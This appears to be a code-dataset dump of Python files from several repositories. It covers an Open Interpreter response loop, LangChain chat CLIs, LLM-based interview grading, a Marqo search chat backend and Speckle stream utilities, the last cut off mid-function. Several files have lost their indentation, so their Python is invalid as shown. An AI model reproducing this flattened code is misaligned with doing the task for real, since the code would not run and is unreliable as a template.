info = self.get_info_for_system_message()
system_message = self.system_message + "\n\n" + info
if self.local:
# Model determines how much we'll trim the messages list to get it under the context limit
# So for Code-Llama, we'll use "gpt-3.5-turbo" which (i think?) has the same context window as Code-Llama
self.model = "gpt-3.5-turbo"
# In the future lets make --model {model} just work / include llama
messages = tt.trim(self.messages, self.model, system_message=system_message)
if self.debug_mode:
print("\n", "Sending `messages` to LLM:", "\n")
print(messages)
print()
# Make LLM call
if not self.local:
# gpt-4
response = openai.ChatCompletion.create(
model=self.model,
messages=messages,
functions=[function_schema],
stream=True,
temperature=self.temperature,
)
elif self.local:
# Code-Llama
# Turn function messages -> system messages for llama compatability
messages = self.messages
for message in messages:
if message['role'] == 'function':
message['role'] = 'system'
response = self.llama_instance.create_chat_completion(
messages=messages,
stream=True,
temperature=self.temperature,
)
# Initialize message, function call trackers, and active block
self.messages.append({})
in_function_call = False
llama_function_call_finished = False
self.active_block = None
for chunk in response:
delta = chunk["choices"][0]["delta"]
# Accumulate deltas into the last message in messages
self.messages[-1] = merge_deltas(self.messages[-1], delta)
# Check if we're in a function call
if not self.local:
condition = "function_call" in self.messages[-1]
elif self.local:
# Since Code-Llama can't call functions, we just check if we're in a code block.
# This simply returns true if the number of "```" in the message is odd.
if "content" in self.messages[-1]:
condition = self.messages[-1]["content"].count("```") % 2 == 1
else:
# If it hasn't made "content" yet, we're certainly not in a function call.
condition = False
if condition:
# We are in a function call.
# Check if we just entered a function call
if in_function_call == False:
# If so, end the last block,
self.end_active_block()
# Print newline if it was just a code block or user message
# (this just looks nice)
last_role = self.messages[-2]["role"]
if last_role == "user" or last_role == "function":
print()
# then create a new code block
self.active_block = CodeBlock()
# Remember we're in a function_call
in_function_call = True
# Now let's parse the function's arguments:
if not self.local:
# gpt-4
# Parse arguments and save to parsed_arguments, under function_call
if "arguments" in self.messages[-1]["function_call"]:
arguments = self.messages[-1]["function_call"]["arguments"]
new_parsed_arguments = parse_partial_json(arguments)
if new_parsed_arguments:
# Only overwrite what we have if it's not None (which means it failed to parse)
self.messages[-1]["function_call"][
"parsed_arguments"] = new_parsed_arguments
elif self.local:
# Code-Llama
# Parse current code block and save to parsed_arguments, under function_call
if "content" in self.messages[-1]:
current_code_block = self.messages[-1]["content"].split("```")[-1]
language = current_code_block.split("\n")[0]
# Default to python if it just did a "```" then continued writing code
if language == "" and "\n" in current_code_block:
language = "python"
code = current_code_block.split("\n")[1:]
arguments = {"language": language, "code": code}
# Code-Llama won't make a "function_call" property for us to store this under, so:
if "function_call" not in self.messages[-1]:
self.messages[-1]["function_call"] = {}
self.messages[-1]["function_call"]["parsed_arguments"] = arguments
else:
# We are not in a function call.
# Check if we just left a function call
if in_function_call == True:
if self.local:
# This is the same as when gpt-4 gives finish_reason as function_call.
# We have just finished a code block, so now we should run it.
llama_function_call_finished = True
# Remember we're not in a function_call
in_function_call = False
# If there's no active block,
if self.active_block == None:
# Create a message block
self.active_block = MessageBlock()
# Update active_block
self.active_block.update_from_message(self.messages[-1])
# Check if we're finished
if chunk["choices"][0]["finish_reason"] or llama_function_call_finished:
if chunk["choices"][
0]["finish_reason"] == "function_call" or llama_function_call_finished:
# Time to call the function!
# (Because this is Open Interpreter, we only have one function.)
if self.debug_mode:
print("Running function:")
print(self.messages[-1])
print("---")
# Ask for user confirmation to run code
if not self.auto_run:
# End the active block so you can run input() below it
# Save language and code so we can create a new block in a moment
self.active_block.end()
language = self.active_block.language
code = self.active_block.code
# Prompt user
response = input(" Would you like to run this code? (y/n)\n\n ")
print("") # <- Aesthetic choice
if response.strip().lower() == "y":
# Create a new, identical block where the code will actually be run
self.active_block = CodeBlock()
self.active_block.language = language
self.active_block.code = code
else:
# User declined to run code.
self.active_block.end()
self.messages.append({
    "role": "function",
    "name": "run_code",
    "content": "User decided not to run this code."
})
return
# If we couldn't parse its arguments, we need to try again.
if "parsed_arguments" not in self.messages[-1]["function_call"]:
print("> Function call could not be parsed.\n\nPlease open an issue on Github (openinterpreter.com, click Github) and paste the following:")
print("\n", self.messages[-1]["function_call"], "\n")
time.sleep(2)
print("Informing the language model and continuing...")
# Reiterate what we need to the language model:
self.messages.append({
"role": "function",
"name": "run_code",
"content": """Your function call could not be parsed. Please use ONLY the `run_code` function, which takes two parameters: `code` and `language`. Your response should be formatted as a JSON."""
})
# Go around again
self.respond()
return
# Create or retrieve a Code Interpreter for this language
language = self.messages[-1]["function_call"]["parsed_arguments"][
"language"]
if language not in self.code_interpreters:
self.code_interpreters[language] = CodeInterpreter(language, self.debug_mode)
code_interpreter = self.code_interpreters[language]
# Let this Code Interpreter control the active_block
code_interpreter.active_block = self.active_block
code_interpreter.run()
# End the active_block
self.active_block.end()
# Append the output to messages
# Explicitly tell it if there was no output (sometimes "" = hallucinates output)
self.messages.append({
"role": "function",
"name": "run_code",
"content": self.active_block.output if self.active_block.output else "No output"
})
# Go around again
self.respond()
if chunk["choices"][0]["finish_reason"] != "function_call":
# Done!
# Code Llama likes to output "###" at the end of every message for some reason
if self.local and "content" in self.messages[-1]:
self.messages[-1]["content"] = self.messages[-1]["content"].strip().rstrip("#")
self.active_block.update_from_message(self.messages[-1])
time.sleep(0.1)
self.active_block.end()
return | [
"User decided not to run this code.",
"No output",
"Your function call could not be parsed. Please use ONLY the `run_code` function, which takes two parameters: `code` and `language`. Your response should be formatted as a JSON."
] |
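The streaming loop above folds per-chunk deltas into the last message via `merge_deltas`. As a point of reference, here is a minimal sketch of that accumulation pattern for OpenAI-style delta dicts; `merge_deltas_sketch` is an illustrative stand-in, not the repository's actual helper:

# Illustrative sketch only: fold OpenAI-style streaming deltas into one message dict.
def merge_deltas_sketch(message, delta):
    for key, value in delta.items():
        if isinstance(value, dict):
            message[key] = merge_deltas_sketch(message.get(key, {}), value)
        else:
            message[key] = message.get(key, "") + value
    return message

# Two streamed chunks of a function call accumulate into a single, parseable call.
msg = {}
msg = merge_deltas_sketch(msg, {"function_call": {"name": "run_code", "arguments": '{"language": "py'}})
msg = merge_deltas_sketch(msg, {"function_call": {"arguments": 'thon"}'}})
assert msg["function_call"]["arguments"] == '{"language": "python"}'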
2024-01-10 | alejandro-ao/chagpt-cli-python | main_entity.py | from dotenv import load_dotenv
import os
from langchain.chat_models import ChatOpenAI
from langchain.chains import ConversationChain
from langchain.memory import ConversationEntityMemory
from langchain.memory.prompt import ENTITY_MEMORY_CONVERSATION_TEMPLATE
def main():
load_dotenv()
# test our api key
if os.getenv("OPENAI_API_KEY") is None or os.getenv("OPENAI_API_KEY") == "":
print("OPENAI_API_KEY is not set. Please add your key to .env")
exit(1)
else:
print("API key set.")
llm = ChatOpenAI()
conversation = ConversationChain(
llm=llm,
memory=ConversationEntityMemory(llm=llm),
prompt=ENTITY_MEMORY_CONVERSATION_TEMPLATE,
verbose=False
)
print("Hello, I am ChatGPT CLI!")
while True:
user_input = input("> ")
ai_response = conversation.predict(input=user_input)
print("\nAssistant:\n", ai_response)
if __name__ == '__main__':
main()
| [] |
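A small, optional variation on the loop above (not part of the original script): the same REPL with a clean exit path, so the process does not have to be killed to stop it.

# Illustrative variation only: identical chat loop, plus an explicit way to quit.
def chat_loop(conversation):
    print("Hello, I am ChatGPT CLI! Type 'exit' to quit.")
    while True:
        try:
            user_input = input("> ")
        except (EOFError, KeyboardInterrupt):
            break
        if user_input.strip().lower() == "exit":
            break
        print("\nAssistant:\n", conversation.predict(input=user_input))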
2024-01-10 | alejandro-ao/chagpt-cli-python | main_buffer.py | from dotenv import load_dotenv
import os
from langchain.memory import ConversationBufferMemory
from langchain.chains import ConversationChain
from langchain.chat_models import ChatOpenAI
def main():
load_dotenv()
# Load the OpenAI API key from the environment variable
if os.getenv("OPENAI_API_KEY") is None or os.getenv("OPENAI_API_KEY") == "":
print("OPENAI_API_KEY is not set")
exit(1)
else:
print("OPENAI_API_KEY is set")
llm = ChatOpenAI(temperature=0)
conversation = ConversationChain(
llm=llm, verbose=True, memory=ConversationBufferMemory())
print("Hello, I am ChatGPT CLI!")
while True:
user_input = input("> ")
ai_response = conversation.predict(input=user_input)
print("\nAssistant:\n", ai_response, "\n")
if __name__ == '__main__':
main()
| [] |
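For reference, ConversationBufferMemory simply records every turn and replays the full transcript as the `history` prompt variable on each call. A minimal sketch using the standard memory interface (save_context / load_memory_variables); the exact formatting of the returned history may differ between LangChain versions:

from langchain.memory import ConversationBufferMemory

# Standalone sketch: exercise the buffer memory without any LLM call.
memory = ConversationBufferMemory()
memory.save_context({"input": "Hi, I'm Ana."}, {"output": "Hello Ana!"})
memory.save_context({"input": "What's my name?"}, {"output": "You told me it's Ana."})
# The whole transcript is injected into the prompt on every turn:
print(memory.load_memory_variables({})["history"])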
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | resume_details_questions~resume_details_to_questioning.py | # A function to get a set of question for performing an interview based on a person's Resume.
# The output of Resume_ContentExtractor.py in this repo is the ideal input for this function.
# The result of this function is a set of 10 questions.
from langchain.chat_models import ChatOpenAI
from langchain.prompts.prompt import PromptTemplate
from langchain.chains import LLMChain
from langchain.llms import OpenAI
import os
from dotenv import load_dotenv
from ResumeDetailsExtraction import gen_text  # gen_text (defined alongside this module) builds the resume summary used below
load_dotenv()
# Add your own OPENAI_API_KEY for usage
def generate_questions(resume,role='',experience=''):
_PROMPT_TEMPLATE = """
this is the resume of user:
{resume_details}
here is the role he want to join in :
{role}
Based on the following experience:
{experience}
What are your interview questions for the given user resume and role he want to join in with that experience?
generate no of questions = {questions}!
"""
PROMPT = PromptTemplate(input_variables=["resume_details", "role", "experience",'questions'], template=_PROMPT_TEMPLATE)
llm1 = OpenAI(model_name="text-davinci-003", temperature=0)
chain = LLMChain(llm=llm1, prompt=PROMPT)
prompt = chain.predict_and_parse(resume_details= gen_text(resume),
role= role,
experience= experience,
questions=10)
return prompt.split('\n')
| [
"experience",
"resume_details",
"\n this is the resume of user:\n {resume_details}\n here is the role he want to join in :\n {role}\n Based on the following experience:\n {experience}\n What are your interview questions for the given user resume and role he want to join in with that experience?\n generate no of questions = {questions}!\n ",
"questions"
] |
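A hypothetical call to `generate_questions`; the PDF path, role, and experience values below are placeholders, OPENAI_API_KEY must be set, and the import assumes this repository's folder layout.

from resume_details_to_questioning import generate_questions  # module name assumed from this repo's layout

if __name__ == "__main__":
    questions = generate_questions(
        "my_resume.pdf",            # placeholder path; passed through gen_text() internally
        role="Backend Engineer",
        experience="3 years",
    )
    for i, q in enumerate(questions, 1):
        print(i, q)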
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | Individual_grading~QuestionAnsGrading.py | import guidance
def indiQuesGrade(question, answer, role, exp):
# Initialize the evaluator model
evaluatorModel = guidance.llms.OpenAI('gpt-3.5-turbo')
# Define the evaluation system using the guidance template
evaluationSys = guidance('''
{{#system~}}
You are an expert system in Evaluating the answer provided by an interviewee in an interview.
Based on the question, answer given with information of Applying Role and Years of Experience, you can grade the answer on appropriate grading measures.
You are very skilled in grading the answers accurately and justifiably.
{{~/system}}
{{#user~}}
Now, you are provided with Interviewee's Question, his job role he applied to, and his years of experience he has with it.
You are now asked to generate suitable/appropriate grading measures for the question and grade his answer according to them.
The Question asked as follows:
{{question}}
The Role he applied to is as follows :
{{role}}
The years of experience he has in it is as follows :
{{experience}}
Now, generate the grading measures according to the above question, role and experience values.
The grading measures must be generated as a array elements with names as the grading rubrics. They are placed between two square brackets, separated by commas.
Do not output the grading measures yet.
{{~/user}}
{{#assistant~}}
{{gen 'grading_measures' temperature=0.7 max_tokens=150}}
{{~/assistant}}
{{#user~}}
Here's the answer provided by the interviewee in the interview :
{{answer}}
Now, perform the evaluation on the answer according to the generated grading measures.
Output the evaluation in a JSON Format with the grading measure as key and a dictionary of score and reason as value.
The score key contains a numerical measure depicting the answer against grading measure and the reason key contains text information
about why the answer was such given such numerical grade in the evaluation measure.
Add the key of overall score to the output JSON with a dictionary as it's value. The dictionary must have two keys, score, depicting the numerical measure
as a overall evaluations score, graded against a score of 5 and the other key as reason, showing a Justification Statement.
The output response must only contain a JSON File of evaluation. Do not output any additional information other than it.
{{~/user}}
{{#assistant~}}
{{gen 'evaluation' temperature=0.5 max_tokens=1500}}
{{~/assistant}}
''', llm = evaluatorModel)
# Call the evaluation system with the provided inputs
output = evaluationSys(question=question, role=role, experience=exp, answer=answer)
# Return the evaluation and grading measures
return output['evaluation'], output['grading_measures']
| [] |
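A hypothetical call to `indiQuesGrade`, with the returned evaluation parsed as JSON. The question, answer, role, and experience strings are invented; the model returning strictly valid JSON is an assumption the prompt makes, so a fallback is kept.

import json
from QuestionAnsGrading import indiQuesGrade  # module name assumed from this repo's layout

evaluation_text, grading_measures = indiQuesGrade(
    question="Explain how a database index speeds up a query.",
    answer="An index is a sorted lookup structure, so the engine can avoid a full table scan.",
    role="Backend Engineer",
    exp="3 years",
)
print("Grading measures:", grading_measures)
try:
    evaluation = json.loads(evaluation_text)
    print("Overall:", evaluation.get("overall score"))
except json.JSONDecodeError:
    print(evaluation_text)  # model did not return strict JSON; show the raw text instead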
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | Final_Grading~FinalGrad.py | import guidance
'''
This function represents the final evaluation of the interviewee. It takes the resume summary extracted using the `resume_details_extractor` code,
the role the interviewee applied for, and their experience level as input.
The ires parameter represents the CSV file containing the evaluation of each question and answer.
Based on these inputs, the function generates the interviewee's final evaluation
'''
def finalGradingPrompt(resume_summary, role, exp, ires):
# Initialize the guidance model
model = guidance.llms.OpenAI('gpt-3.5-turbo')
# Define the final grading prompt using the guidance template
finalRes = guidance('''
{{#system~}}
You are now the Final Decision Interview Result Grading Expert. You are provided with an Interview's evaluation details.
You need to evaluate the interview scenario and provide an overall score and set of Scope of Improvement statements for the interviewee.
{{~/system}}
{{#user~}}
The interview has been completed and the results of the interview will be provided to you. You need to evaluate the case and
provide an overall score of the interviewee's performance and suggestions for further improvements if required, based on the overall score.
Here's the Interviewee's Extracted JSON Summary:
{{resume_summary}}
{{~/user}}
{{#user~}}
The interviewee applied to the following role:
{{role}}
and has the following experience in that role:
{{exp}}
Here are the list of CSV records made from questions answered with grades under appropriate rubrics. These records also
contain the start and end timestamps of the interviewee answering the questions within a 2-minute time constraint.
Finally, the records contain a float value of the plagiarism score. We have set the threshold of 0.96 for an answer to be considered plagiarized.
The CSV records are as follows:
{{ires}}
{{~/user}}
{{#user~}}
Based on the above inputs of the interview, generate an overall performance score and scope of improvements based on it.
{{~/user}}
{{#assistant~}}
{{gen 'final_evaluation' temperature=0.5 max_tokens=1000}}
{{~/assistant}}
''', llm=model)
# Calling the final grading prompt with the provided inputs
res = finalRes(resume_summary=resume_summary, role=role, exp=exp, ires=ires)
# Return the final evaluation from the response
return res['final_evaluation']
| [] |
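The `ires` argument is described above as CSV records of per-question grades, answer timestamps, and a plagiarism score. A hedged sketch of how such records could be assembled with pandas; the column names and values are illustrative, not a schema prescribed by the repository.

import pandas as pd

# Illustrative only: build the CSV string that finalGradingPrompt receives as `ires`.
records = pd.DataFrame([
    {"question": "Explain database indexing.", "overall_score": 4.0,
     "start_time": "2024-01-10T10:00:00", "end_time": "2024-01-10T10:01:40",
     "plagiarism_score": 0.12},
    {"question": "Describe a REST API you built.", "overall_score": 3.5,
     "start_time": "2024-01-10T10:02:00", "end_time": "2024-01-10T10:03:55",
     "plagiarism_score": 0.97},   # above the 0.96 threshold mentioned in the prompt
])
ires = records.to_csv(index=False)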
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | resume_details_questions~ResumeDetailsExtraction.py | from PyPDF2 import PdfReader
from langchain.chat_models import ChatOpenAI
from kor import create_extraction_chain, Object, Text
from langchain.prompts.prompt import PromptTemplate
from langchain.chains import LLMChain
from langchain.llms import OpenAI
import os
from dotenv import load_dotenv
#Add your own OPENAI_API_KEY to the Environment
load_dotenv()
def gen_text(pdf_file):
#Creates Readable Text Content from a PDF Resume File.
with open(pdf_file, "rb") as f:
reader = PdfReader(f)
num_pages = len(reader.pages)
text = ""
for page in reader.pages:
text += page.extract_text()
constraints=context_extracter(text)
return constraints
def context_extracter(text):
# Works with GPT-3.5. Takes the extracted resume text and returns a JSON-style summary of the resume.
llm = ChatOpenAI(
model_name="gpt-3.5-turbo",
temperature=0,
max_tokens=1900,
frequency_penalty=0,
presence_penalty=0,
top_p=1.0,
)
schema = Object(
id="interviewer",
description=(
"interviewer is examining resume text and should produce set of attributes which represents that person by his resume"
),
attributes=[
Text(
id="summary_or_objective",
description="A brief overview of the candidate's professional background, skills, and career goals",
examples=[],
many=True,
),
Text(
id="work_experience",
description="Details of previous employment positions, including job titles, company names, employment dates, and a description of responsibilities and achievements for each role ",
examples=[],
many=True,
),
Text(
id="education",
description="Information about the candidate's educational qualifications, including degrees, certificates, and the names of institutions attended",
examples=[],
many=True,
),
Text(
id="skills",
description="A section highlighting the candidate's relevant skills, such as technical skills, languages spoken, software proficiency, or specific tools used",
examples=[],
many=True,
),
Text(
id="achievements_or_awards",
description="Any notable achievements, awards, or recognition received by the candidate during their education or career.",
examples=[],
many=True,
),
Text(
id="certifications_or_licenses",
description="Information about any professional certifications or licenses held by the candidate that are relevant to the desired position",
examples=[],
many=True,
),
Text(
id="projects",
description="Details of significant projects the candidate has worked on, including a brief description, their role, and any notable outcomes",
examples=[],
many=True,
),
Text(
id="publications_or_presentations",
description=" If applicable, a list of publications or presentations the candidate has authored or delivered, including the titles, dates, and locations",
examples=[],
many=True,
),
],
many=True,
)
# chain = LLMChain(llm=llm1, prompt=PROMPT)
chain = create_extraction_chain(llm, schema, encoder_or_encoder_class='json')
return chain.predict_and_parse(text=text)['data']
| [] |
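A hypothetical use of `gen_text`; the PDF path is a placeholder, OPENAI_API_KEY must be set, and the import assumes this repository's folder layout.

import json
from ResumeDetailsExtraction import gen_text  # module name assumed from this repo's layout

summary = gen_text("my_resume.pdf")   # Kor extraction result for the resume text
print(json.dumps(summary, indent=2, default=str))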
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | follow_up_question_gen~FollowUpQuesGen.py | from langchain.prompts.prompt import PromptTemplate
from langchain.chains import LLMChain
from langchain.llms import OpenAI
def question_generation(question, ans, context):
# Define the prompt template for generating follow-up questions
PROMPT_TEMPLATE = """Answer the following question:
{question}
Here is the user given answer:
{answer}
Based on the following context:
{context}
-
what are the top 3 follow-up questions to ask with the intent to validate the genuinity of the answer and to gather more insights about the candidate in relation to the context?
"""
# Create a PromptTemplate object with the input variables and template
PROMPT = PromptTemplate(input_variables=["question", "answer", "context"], template=PROMPT_TEMPLATE)
# Create an OpenAI language model (LLM) instance
llm = OpenAI(model_name="text-davinci-003",
temperature=0.7,
max_tokens=100,
top_p=1.0,
frequency_penalty=0.0,
presence_penalty=0.0)
# Create an LLMChain instance with the LLM and prompt template
chain = LLMChain(llm=llm, prompt=PROMPT)
# Predict and parse the follow-up questions using the chain
q = chain.predict_and_parse(question=question, answer=ans, context=context)
# Return the generated follow-up questions
return q
| [
"question",
"Answer the following question:\n {question}\n Here is the user given answer:\n {answer}\n Based on the following context:\n {context}\n -\n what are the top 3 follow-up questions to ask with the intent to validate the genuinity of the answer and to gather more insights about the candidate in relation to the context?\n ",
"context",
"answer"
] |
2024-01-10 | OwenPendrighElliott/MarqoKnowledgeManagement | backend~ai_chat.py | import openai
from data_models import HumanMessage, AIMessage, SystemMessage
import json
from utils import remove_responses
from knowledge_store import MarqoKnowledgeStore
from typing import List, Dict, Generator
from dotenv import load_dotenv
load_dotenv()
FUNCTIONS = [
{
"name": "search_marqo",
"description": "This is a search engine, use it when the user instructs you to search in any way. Also use it for organisational knowledge or personal information.",
"parameters": {
"type": "object",
"properties": {
"query": {
"type": "string",
"description": "A natural language search query",
},
},
"required": ["query"],
},
},
]
def search_marqo(query: str, mks: MarqoKnowledgeStore, limit: int) -> str:
try:
results = mks.query_for_content(query, limit=limit if limit is not None else 4)
return json.dumps(results)
except Exception as e:
return {"marqo_search_error": e}
def format_chat(conversation: List[str], user_input: str) -> List[Dict[str, str]]:
llm_conversation = [
SystemMessage(
content="All code should specify the language so that markdown can be rendered."
)
]
for i in range(len(conversation)):
if i % 2:
msg = AIMessage(content=remove_responses(conversation[i]))
else:
msg = HumanMessage(content=conversation[i])
llm_conversation.append(msg)
llm_conversation.append(HumanMessage(content=user_input))
open_ai_conversation = [vars(m) for m in llm_conversation]
return open_ai_conversation
def append_function_deltas(
function_call: Dict[str, str], delta_function_call: Dict[str, str]
) -> Dict[str, str]:
function_call["arguments"] += delta_function_call["arguments"]
return function_call
def converse(
user_input: str, conversation: List[str], mks: MarqoKnowledgeStore, limit: int
) -> Generator:
conversation = format_chat(conversation, user_input)
stream1 = openai.ChatCompletion.create(
model="gpt-3.5-turbo-0613",
messages=conversation,
functions=FUNCTIONS,
function_call="auto",
stream=True,
)
function_call = None
for chunk in stream1:
token = chunk["choices"][0].get("delta", {}).get("content")
if token is not None:
yield token.encode("utf-8")
elif (
chunk["choices"][0]["delta"].get("function_call") and function_call is None
):
yield "```curl\nBackend Function Call\n".encode("utf-8")
func = chunk["choices"][0]["delta"]["function_call"]
yield f"Function: {func['name']}\n".encode("utf-8")
yield "Arguments:\n".encode("utf-8")
yield func["arguments"].encode("utf-8")
function_call = func
elif chunk["choices"][0]["delta"].get("function_call"):
func = chunk["choices"][0]["delta"]["function_call"]
yield func["arguments"].encode("utf-8")
function_call = append_function_deltas(function_call, func)
if function_call is not None:
yield "\n```\n".encode("utf-8")
stream1.close()
message = {
"role": "assistant",
"content": None,
"function_call": {
"name": function_call["name"],
"arguments": function_call["arguments"],
},
}
if message.get("function_call"):
function_name = message["function_call"]["name"]
arguments = json.loads(message["function_call"]["arguments"])
function_response = search_marqo(
query=arguments.get("query"), mks=mks, limit=limit
)
yield "\n```curl\nResponse:\n".encode("utf-8")
yield f"{json.dumps(function_response, indent=4)}\n```\n".encode("utf-8")
stream2 = openai.ChatCompletion.create(
model="gpt-3.5-turbo-0613",
messages=[
*conversation,
message,
{
"role": "function",
"name": function_name,
"content": function_response,
},
],
stream=True,
)
for chunk in stream2:
token = chunk["choices"][0].get("delta", {}).get("content")
if token is not None:
yield token.encode("utf-8")
stream2.close()
| [
"All code should specify the language so that markdown can be rendered.",
"None"
] |
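A hypothetical driver for `converse`: it drains the byte-chunk generator, joins the decoded pieces into one reply, and keeps the alternating user/assistant history that `format_chat` expects. Constructing the MarqoKnowledgeStore is outside this sketch and assumed to happen elsewhere.

# Illustrative only: how a caller might consume the converse() generator.
def demo_chat(mks, history):
    user_input = "Search for our onboarding checklist"
    pieces = [chunk.decode("utf-8") for chunk in converse(user_input, history, mks, limit=4)]
    reply = "".join(pieces)
    history.extend([user_input, reply])   # keep the alternating user/assistant turn order
    return reply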
2024-01-10 | SerjoschDuering/RECODE_speckle_utils | speckle_utils.py | #speckle utils
import json
import pandas as pd
import numpy as np
import specklepy
from specklepy.api.client import SpeckleClient
from specklepy.api.credentials import get_default_account, get_local_accounts
from specklepy.transports.server import ServerTransport
from specklepy.api import operations
from specklepy.objects.geometry import Polyline, Point, Mesh
from specklepy.api.wrapper import StreamWrapper
try:
import openai
except:
pass
import requests
from datetime import datetime
import copy
# HELP FUNCTION ===============================================================
def helper():
"""
Prints out the help message for this module.
"""
print("This module contains a set of utility functions for speckle streams.")
print("______________________________________________________________________")
print("It requires the specklepy package to be installed -> !pip install specklepy")
print("the following functions are available:")
print("getSpeckleStream(stream_id, branch_name, client)")
print("getSpeckleGlobals(stream_id, client)")
print("get_dataframe(objects_raw, return_original_df)")
print("updateStreamAnalysis(stream_id, new_data, branch_name, geometryGroupPath, match_by_id, openai_key, return_original)")
print("there are some more function available not documented fully yet, including updating a notion database")
print("______________________________________________________________________")
print("for detailed help call >>> help(speckle_utils.function_name) <<< ")
print("______________________________________________________________________")
print("standard usage:")
print("______________________________________________________________________")
print("retreiving data")
print("1. import speckle_utils & speckle related libaries from specklepy")
print("2. create a speckle client -> client = SpeckleClient(host='https://speckle.xyz/')" )
print(" client.authenticate_with_token(token='your_token_here')")
print("3. get a speckle stream -> stream = speckle_utils.getSpeckleStream(stream_id, branch_name, client)")
print("4. get the stream data -> data = stream['pth']['to']['data']")
print("5. transform data to dataframe -> df = speckle_utils.get_dataframe(data, return_original_df=False)")
print("______________________________________________________________________")
print("updating data")
print("1. call updateStreamAnalysis --> updateStreamAnalysis(new_data, stream_id, branch_name, geometryGroupPath, match_by_id, openai_key, return_original)")
#==============================================================================
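# Example of the standard flow that helper() prints, wrapped in a function so nothing runs on import.
# The host URL, token, stream id, branch name and data path below are placeholders.
def _example_usage():
    client = SpeckleClient(host="https://speckle.xyz/")
    client.authenticate_with_token(token="your_token_here")
    stream = getSpeckleStream("your_stream_id", "main", client)
    objects_raw = stream["@Speckle"]["Geometry"]   # path depends on how the stream was published
    return get_dataframe(objects_raw, return_original_df=False)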
def getSpeckleStream(stream_id,
branch_name,
client,
commit_id=""
):
"""
Retrieves data from a specific branch of a speckle stream.
Args:
stream_id (str): The ID of the speckle stream.
branch_name (str): The name of the branch within the speckle stream.
client (specklepy.api.client.Client, optional): A speckle client. Defaults to a global `client`.
commit_id (str): id of a commit, if nothing is specified, the latest commit will be fetched
Returns:
dict: The speckle stream data received from the specified branch.
This function retrieves the last commit from a specific branch of a speckle stream.
It uses the provided speckle client to get the branch and commit information, and then
retrieves the speckle stream data associated with the last commit.
It prints out the branch details and the creation dates of the last three commits for debugging purposes.
"""
print("updated A")
# set stream and branch
try:
branch = client.branch.get(stream_id, branch_name, 3)
print(branch)
except:
branch = client.branch.get(stream_id, branch_name, 1)
print(branch)
print("last three commits:")
[print(ite.createdAt) for ite in branch.commits.items]
if commit_id == "":
latest_commit = branch.commits.items[0]
choosen_commit_id = latest_commit.id
commit = client.commit.get(stream_id, choosen_commit_id)
print("latest commit ", branch.commits.items[0].createdAt, " was choosen")
elif type(commit_id) == type("s"): # string, commit uuid
choosen_commit_id = commit_id
commit = client.commit.get(stream_id, choosen_commit_id)
print("provided commit ", choosen_commit_id, " was choosen")
elif type(commit_id) == type(1): #int
latest_commit = branch.commits.items[commit_id]
choosen_commit_id = latest_commit.id
commit = client.commit.get(stream_id, choosen_commit_id)
print(commit)
print(commit.referencedObject)
# get transport
transport = ServerTransport(client=client, stream_id=stream_id)
#speckle stream
res = operations.receive(commit.referencedObject, transport)
return res
def getSpeckleGlobals(stream_id, client):
"""
Retrieves global analysis information from the "globals" branch of a speckle stream.
Args:
stream_id (str): The ID of the speckle stream.
client (specklepy.api.client.Client, optional): A speckle client. Defaults to a global `client`.
Returns:
analysisInfo (dict or None): The analysis information retrieved from globals. None if no globals found.
analysisGroups (list or None): The analysis groups retrieved from globals. None if no globals found.
This function attempts to retrieve and parse the analysis information from the "globals"
branch of the specified speckle stream. It accesses and parses the "analysisInfo" and "analysisGroups"
global attributes, extracts analysis names and UUIDs.
If no globals are found in the speckle stream, it returns None for both analysisInfo and analysisGroups.
"""
# get the latest commit
try:
# speckle stream globals
branchGlob = client.branch.get(stream_id, "globals")
latest_commit_Glob = branchGlob.commits.items[0]
transport = ServerTransport(client=client, stream_id=stream_id)
globs = operations.receive(latest_commit_Glob.referencedObject, transport)
# access and parse globals
#analysisInfo = json.loads(globs["analysisInfo"]["@{0;0;0;0}"][0].replace("'", '"'))
#analysisGroups = [json.loads(gr.replace("'", '"')) for gr in globs["analysisGroups"]["@{0}"]]
def get_error_context(e, context=100):
start = max(0, e.pos - context)
end = e.pos + context
error_line = e.doc[start:end]
pointer_line = ' ' * (e.pos - start - 1) + '^'
return error_line, pointer_line
try:
analysisInfo = json.loads(globs["analysisInfo"]["@{0;0;0;0}"][0].replace("'", '"').replace("None", "null"))
except json.JSONDecodeError as e:
print(f"Error decoding analysisInfo: {e}")
error_line, pointer_line = get_error_context(e)
print("Error position and surrounding text:")
print(error_line)
print(pointer_line)
analysisInfo = None
try:
analysisGroups = [json.loads(gr.replace("'", '"').replace("None", "null")) for gr in globs["analysisGroups"]["@{0}"]]
except json.JSONDecodeError as e:
print(f"Error decoding analysisGroups: {e}")
error_line, pointer_line = get_error_context(e)
print("Error position and surrounding text:")
print(error_line)
print(pointer_line)
analysisGroups = None
# extract analysis names
analysis_names = []
analysis_uuid = []
[(analysis_names.append(key.split("++")[0]),analysis_uuid.append(key.split("++")[1]) ) for key in analysisInfo.keys()]
# print extracted results
print("there are global dictionaries with additional information for each analysis")
print("<analysisGroups> -> ", [list(curgrp.keys()) for curgrp in analysisGroups])
print("<analysis_names> -> ", analysis_names)
print("<analysis_uuid> -> ", analysis_uuid)
except Exception as e: # catch exception as 'e'
analysisInfo = None
analysisGroups = None
print("No GlOBALS FOUND")
print(f"Error: {e}") # print error description
return analysisInfo, analysisGroups
#function to extract non geometry data from speckle
def get_dataframe(objects_raw, return_original_df=False):
"""
Creates a pandas DataFrame from a list of raw Speckle objects.
Args:
objects_raw (list): List of raw Speckle objects.
return_original_df (bool, optional): If True, the function also returns the original DataFrame before any conversion to numeric. Defaults to False.
Returns:
pd.DataFrame or tuple: If return_original_df is False, returns a DataFrame where all numeric columns have been converted to their respective types,
and non-numeric columns are left unchanged.
If return_original_df is True, returns a tuple where the first item is the converted DataFrame,
and the second item is the original DataFrame before conversion.
This function iterates over the raw Speckle objects, creating a dictionary for each object that excludes the '@Geometry' attribute.
These dictionaries are then used to create a pandas DataFrame.
The function attempts to convert each column to a numeric type if possible, and leaves it unchanged if not.
Non-convertible values in numeric columns are replaced with their original values.
"""
# dataFrame
df_data = []
# Iterate over speckle objects
for obj_raw in objects_raw:
obj = obj_raw.__dict__
df_obj = {k: v for k, v in obj.items() if k != '@Geometry'}
df_data.append(df_obj)
# Create DataFrame and GeoDataFrame
df = pd.DataFrame(df_data)
# Convert columns to float or int if possible, preserving non-convertible values
df_copy = df.copy()
